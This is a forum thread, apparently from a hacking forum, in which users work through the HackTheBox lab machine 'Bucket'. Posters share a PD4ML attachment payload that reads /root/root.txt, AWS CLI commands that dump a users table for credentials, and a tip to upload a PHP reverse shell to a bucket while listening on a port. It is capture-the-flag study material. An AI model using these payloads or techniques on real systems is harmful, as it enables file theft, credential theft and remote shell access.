TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#37
We need to trigger POST with :

{
"alerts": [
{
"PutRequest": {
"Item": {
"title": {"S":"Ransomware"} ,
"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
}
}
}
]
}

Something like that I try to make it work.
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Mass Leeching
#38
(October 18, 2020 at 08:47 PM)Kali76 Wrote: [quote="xxxyz" pid='2974742' dateline='1603045537']
We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.
[/quote
I don’t understand, how do you do a make post request? with burb? this parameters where did you get them?


curl -X POST 127.0.0.1:8000 ...
#39
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
"alerts": [
{
"PutRequest": {
"Item": {
"title": {"S":"Ransomware"} ,
"data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
}
}
}
]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(
#40
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

this will give u those creds

great man thank you. can you explain me the steps to find this command ?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then i was searching to get those table contents and dynamodb has an option scan "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples i used this command since we already know the tables name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" i got it from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but i dont find any credentials

go to http://s3.bucket.htb/shell
you have now someting.
use aws configure command and paste domain name
#41
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...
#42
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
#43
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
where can i find the pdf?
#44
(October 18, 2020 at 09:59 PM)ARhOmOuTEd Wrote:
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
where can i find the pdf?

I don't know if it contains anything or if it works. The location of where the pdf is saved is in index.php of /var/www/bucket-app
#45
/var/www/bucket-app/index.php <---head is a target but i dont get it lol
#46
(October 19, 2020 at 02:37 AM)skorld Wrote: /var/www/bucket-app/index.php <---head is a target but i dont get it lol

index.php L24:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
#47
(October 18, 2020 at 04:37 PM)Kali76 Wrote:
(October 18, 2020 at 04:35 PM)xxxyz Wrote: When you upload your file in the bucket adserver you need to wait the sync part. When the file in the bucket is out then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.

I've been waiting for at least 10 minutes but nothing, it doesn't find any of the files I upload

short tip
use php reverse shell to copy to a bucket and try to curl it every 2secs since it takes time to deploy

watch -n2 curl http://bucket.htb/{bucket Name}/{file.php}

do this while listening on a port...

;-)
#48
Any one root yet? Still have no idea :(

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB BountyHunter [Discussion] pheonix2021 47 9,680 Yesterday at 10:11 PM
Last Post: jeopardise myself
TUTORIAL HTB Intelligence [Discussion] pheonix2021 94 23,876 Yesterday at 04:41 PM
Last Post: rushabh1435
TUTORIAL HTB Seal [Discussion] pheonix2021 29 11,453 Yesterday at 12:44 PM
Last Post: C09YC47

 Users browsing this thread: 1 Guest(s)